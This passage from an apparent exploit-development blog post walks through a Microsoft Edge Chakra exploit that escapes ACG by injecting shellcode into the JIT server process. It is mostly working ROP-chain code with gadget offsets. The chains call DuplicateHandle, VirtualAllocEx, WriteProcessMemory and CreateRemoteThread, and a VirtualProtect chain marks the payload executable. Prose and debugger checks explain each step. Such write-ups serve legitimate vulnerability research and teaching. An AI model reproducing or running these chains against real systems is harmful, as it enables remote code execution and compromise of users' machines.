write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

You’ll notice right off the bat the comment about LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later. This is very contradictory to what we just said about setting the thread’s entry point to a ROP gadget, and just returning into the stack. I implore the reader to keep this mindset for now, as this is logical to think, but by the end of the blog post I hope it is clear to the reader that is a bit more nuanced than just setting the entry point to a ROP gadget. For now, this isn’t a big deal.

Let’s now see this in action. To make things easier, as we had been using pop rcx as a breakpoint up until this point, we will simply set a breakpoint on our jmp rax gadget and continue executing until we hit our WriteProcessMemory ROP chain (note our jmp rax gadget actually will always be called once before DuplicateHandle. This doesn’t affect us at all and is just mentioned as a point of contention). We will then use pt to execute the call to WriteProcessMemory, until the ret, which will bring us into our CreateRemoteThread ROP chain.

Now that we have hit our CreateRemoteThread ROP chain, we will setup our lpStartAddress parameter, which will go in R9. We will first place a writable address in RAX so that our mov r9, rcx gadget (we will pop our intended value in RCX that we want lpStartAddress to be) will not cause an access violation.

Our call to CreateRemoteThread is in the current state:

CreateRemoteThread(
	-
	-
	-
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

The next parameter we are going to knock out is the hProcess parameter - which is just the same handle to the JIT server with PROCESS_ALL_ACCESS that we have used several times already.

We can see we used pop to get the address of our JIT handle into RCX, and then we dereferenced RCX to get the raw value of the handle into RCX. We also already had a writable value in RAX, so we “bypass” the operation which writes to the memory address contained in RAX (and it doesn’t cause an access violation because the address is writable).

Our call to CreateRemoteThread is now in this state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	-
	-
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

After retrieving the handle of the JIT process, our next parameter we will fill in is the lpThreadAttributes parameter - which just requires a value of 0. We can just directly write this value to the stack and use a pop operation to place the 0 value into RDX to essentially give our thread “normal” security attributes.

Easy as you’d like! Our call is now in the following state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	-
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

Next up is the dwStackSize parameter. Again, we just want to use the default stack size (recall each thread has its own CPU register state, stack, etc.) - meaning we can specify 0 here.

We are now in the following state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

Since the rest of the parameters will be written to the stack RSP + 0x28, 0x30, 0x38. So, we will now place CreateRemoteThread into RAX and use our write primitive to write our remaining parameters to the stack (setting all to 0 but setting the dwCreationFlags to 4 to create this thread in a suspended state).

Our call is now in its final state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	NULL,				// No variable needs to be passed
	4,				// CREATE_SUSPENDED (Create the thread in a suspended state)
	NULL 				// Don't return the thread ID (we don't need it)
);

After executing the call, we get our return value which is a handle to the new thread which lives in the JIT server process.

Running Process Hacker as an administrator and viewing the Handles tab will show our returned handle is, in fact, a Thread handle and refers to the JIT server process.

If we then close out of the window (but not totally out of Process Hacker) we can examine the thread IT (TID) within the Threads tab of the JIT process to confirm where our thread is and what start address it will execute when the thread becomes non-suspended (e.g. resumed).

As we can see, when this thread executes (it is currently suspended and not executing) it will perform a ret, which will load RSP into RIP (or will it? Keep reading towards the end and use critical thinking skills as to why this may not be the case!). Since we will eventually write our final ROP chain to RSP, this will kick off our last ROP chain which will mark our shellcode as RWX. Our next two ROP chains, which are fairly brief, will simply be used to update our final ROP chain. We now have a thread we can control in the process where ACG is disabled - meaning we are inching closer.

WriteProcessMemory ROP Chain (Round 2)

Let’s quickly take a look at our “final” ROP chain (which currently resides in the content process, where our exploit is executing):

// VirtualProtect() ROP chain (will be called in the JIT process)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();

// Store the current offset within the .data section into a var
ropoffsetOne = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
inc();

// Store the current offset within the .data section into a var
ropoffsetTwo = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
inc();

This is a VirtualProtect ROP chain, which will mark the target pages as RWX. As we know we cannot directly allocate and execute RWX pages via remote injection (VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread). So, instead, we will eventually leak the stack of our remote thread that exists within the JIT process (where ACG is disabled). When we resume the thread, our ROP chain will kick off and mark our shellcode as RWX. However, there is a slight problem with this. Let me explain.

We know our shellcode resides in the JIT process at whatever memory address VirtualAllocEx decided. However, our VirtualProtect ROP chain (shown above and at the beginning of this blog post) was embedded within the .data section of the content process (in order to store it, so we can inject it later when the time comes). The issue we are facing is that of a “runtime problem” as our VirtualProtect ROP chain has no way to know what address our shellcode will reside in via our VirtualAllocEx ROP chain. This is not only because the remote allocation occurs after we have “preserved” our VirtualProtect ROP chain, but also because when VirutalAllocEx allocates memory, we request a “private” region of memory, which is “randomized”, and is subject to change after each call to VirtualAllocEx. We can see this in the following gadget:

write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
inc();

The above snippet is from our VirtualProtect ROP chain. When this ROP chain is stored before our massive multiple ROP chains we have been walking through, starting with DuplicateHandle and overwriting our return address, the VirtualProtect ROP chain has no way to know where our shellcode is going to end up. lpAddress is a parameter that requires…

The address of the starting page of the region of pages whose access protection attributes are to be changed.

The shellcode, which we inject into the remote JIT process, is the lpAddress we want to mark as RWX eventually. However, our VirtualProtect ROP chain just uses a placeholder for this value. What we are going to do is use another call to WriteProcessMemory to update this address, at our exploit’s runtime. You’ll also notice the following snippet:

// Store the current offset within the .data section into a var
ropoffsetOne = countMe;

These are simply variables (ropoffsetOne, ropoffsetTwo, ropBegin) that save the current location of our “counter”, which is used to easily write gadgets 8 bytes at a time (we are on a 64-bit system, every pointer is 8 bytes). We “save” the current location in the ROP chain in a variable to allow us to easily write to it later. This will make more sense when we see the full call to WriteProcessMemory via ROP.

Here is how this call is setup:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Psuedo handle to the current process (the content process, when the exploit is executing)
	addressof(VirtualProtectROPChain_offset),		// Address of our return value from VirtualAllocEx (where we want to write the VirtualAllocEx_allocation address to)
	addressof(VirtualAllocEx_Allocation),			// Address of our VirtualAllocEx allocation (where our shellcode resides in the JIT process at this point in the exploit)
